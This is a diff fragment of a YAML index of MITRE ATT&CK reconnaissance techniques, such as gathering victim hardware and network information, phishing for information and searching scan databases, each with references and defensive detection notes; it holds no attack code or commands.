+ modified: '2020-10-24T04:10:36.479Z'
+ created: '2020-10-02T16:27:02.339Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1592.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1592.001
+ url: https://attack.mitre.org/techniques/T1592/001
+ - source_name: ATT ScanBox
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
+ Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Hardware
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).
+ id: attack-pattern--24286c33-d4a4-4419-85c2-1d094a896c26
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T03:53:03.353Z'
+ created: '2020-10-02T16:40:47.488Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1590.005:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1590.005
+ url: https://attack.mitre.org/techniques/T1590/005
+ - source_name: WHOIS
+ url: https://www.whois.net/
+ description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
+ - source_name: DNS Dumpster
+ url: https://dnsdumpster.com/
+ description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
+ - source_name: Circl Passive DNS
+ url: https://www.circl.lu/services/passive-dns/
+ description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
+ Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: IP Addresses
+ description: |-
+ Before compromising a victim, adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+ id: attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:03:29.213Z'
+ created: '2020-10-02T15:59:11.695Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1591.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1591.003
+ url: https://attack.mitre.org/techniques/T1591/003
+ - source_name: ThreatPost Broadvoice Leak
+ url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
+ description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
+ Personal Voicemail Transcripts. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Identify Business Tempo
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
+
+ Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199))
+ id: attack-pattern--2339cf19-8f1e-48f7-8a91-0262ba547b6f
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:10:12.352Z'
+ created: '2020-10-02T16:34:32.435Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1591.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1591.004
+ url: https://attack.mitre.org/techniques/T1591/004
+ - source_name: ThreatPost Broadvoice Leak
+ url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
+ description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
+ Personal Voicemail Transcripts. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Identify Roles
+ description: |-
+ Before compromising a victim, adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
+
+ Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).
+ id: attack-pattern--cc723aff-ec88-40e3-a224-5af9fd983cc4
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:10:36.279Z'
+ created: '2020-10-02T16:37:30.015Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1590.006:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1590.006
+ url: https://attack.mitre.org/techniques/T1590/006
+ - source_name: Nmap Firewalls NIDS
+ url: https://nmap.org/book/firewalls.html
+ description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
+ and Intrusion Detection Systems. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Network Security Appliances
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+ id: attack-pattern--6c2957f9-502a-478c-b1dd-d626c0659413
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:04:13.578Z'
+ created: '2020-10-02T16:01:35.350Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1590.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1590.004
+ url: https://attack.mitre.org/techniques/T1590/004
+ - source_name: DNS Dumpster
+ url: https://dnsdumpster.com/
+ description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Network Topology
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+ id: attack-pattern--34ab90a3-05f6-4259-8f21-621081fdaba5
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:04:40.188Z'
+ created: '2020-10-02T15:49:03.815Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1590.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1590.003
+ url: https://attack.mitre.org/techniques/T1590/003
+ - source_name: Pentesting AD Forests
+ url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
+ description: García, C. (2019, April 3). Pentesting Active Directory Forests.
+ Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Network Trust Dependencies
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
+
+ Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
+ id: attack-pattern--36aa137f-5166-41f8-b2f0-a4cfa1b4133e
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:05:03.816Z'
+ created: '2020-10-02T15:47:59.457Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1598:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1598
+ url: https://attack.mitre.org/techniques/T1598
+ - source_name: ThreatPost Social Media Phishing
+ url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
+ description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
+ Pad For Phishing Attacks. Retrieved October 20, 2020.'
+ - source_name: TrendMictro Phishing
+ url: https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html
+ description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
+ October 20, 2020.
+ - source_name: PCMag FakeLogin
+ url: https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages
+ description: Kan, M. (2019, October 24). Hackers Try to Phish United Nations
+ Staffers With Fake Login Pages. Retrieved October 20, 2020.
+ - source_name: Sophos Attachment
+ url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+ description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+ links – when phishers bring along their own web pages. Retrieved October
+ 20, 2020.'
+ - source_name: GitHub Phishery
+ url: https://github.com/ryhanson/phishery
+ description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+ 23, 2020.
+ - source_name: Microsoft Anti Spoofing
+ url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+ description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+ Retrieved October 19, 2020.
+ - source_name: ACSC Email Spoofing
+ url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ description: Australian Cyber Security Centre. (2012, December). Mitigating
+ Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Phishing for Information
+ description: |-
+ Before compromising a victim, adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.
+
+ All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.
+
+ Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
+ id: attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-25T19:44:58.292Z'
+ created: '2020-10-02T17:07:01.502Z'
+ x_mitre_contributors:
+ - Sebastian Salla, McAfee
+ - Robert Simmons, @MalwareUtkonos
+ x_mitre_data_sources:
+ - Social media monitoring
+ - Mail server
+ - Email gateway
+ x_mitre_detection: |-
+ Depending on the specific method of spearphishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
+
+ When it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.
+
+ Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1597.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1597.002
+ url: https://attack.mitre.org/techniques/T1597/002
+ - source_name: ZDNET Selling Data
+ url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+ description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+ 73 million user records on the dark web. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Purchase Technical Data
+ description: |-
+ Before compromising a victim, adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
+
+ Adversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
+ id: attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:15:26.840Z'
+ created: '2020-10-02T17:05:43.562Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1596.005:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1596.005
+ url: https://attack.mitre.org/techniques/T1596/005
+ - source_name: Shodan
+ url: https://shodan.io
+ description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Scan Databases
+ description: |-
+ Before compromising a victim, adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
+
+ Adversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).
+ id: attack-pattern--ec4be82f-940c-4dcb-87fe-2bbdd17c692f
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:20:18.786Z'
+ created: '2020-10-02T17:00:44.586Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1595.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1595.001
+ url: https://attack.mitre.org/techniques/T1595/001
+ - source_name: Botnet Scan
+ url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+ description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+ a Botnet. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Scanning IP Blocks
+ description: |-
+ Before compromising a victim, adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
+
+ Adversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+ id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:06:09.139Z'
+ created: '2020-10-02T16:54:23.193Z'
+ x_mitre_data_sources:
+ - Packet capture
+ - Network device logs
+ x_mitre_detection: |-
+ Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
+
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1597:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1597
+ url: https://attack.mitre.org/techniques/T1597
+ - source_name: D3Secutrity CTI Feeds
+ url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
+ description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
+ Intelligence Feeds. Retrieved October 20, 2020.
+ - source_name: ZDNET Selling Data
+ url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+ description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+ 73 million user records on the dark web. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Search Closed Sources
+ description: |-
+ Before compromising a victim, adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+
+ Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
+ id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:15:53.892Z'
+ created: '2020-10-02T17:01:42.558Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1593.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1593.002
+ url: https://attack.mitre.org/techniques/T1593/002
+ - source_name: SecurityTrails Google Hacking
+ url: https://securitytrails.com/blog/google-hacking-techniques
+ description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+ Retrieved October 20, 2020.
+ - source_name: ExploitDB GoogleHacking
+ url: https://www.exploit-db.com/google-hacking-database
+ description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+ October 23, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Search Engines
+ description: |-
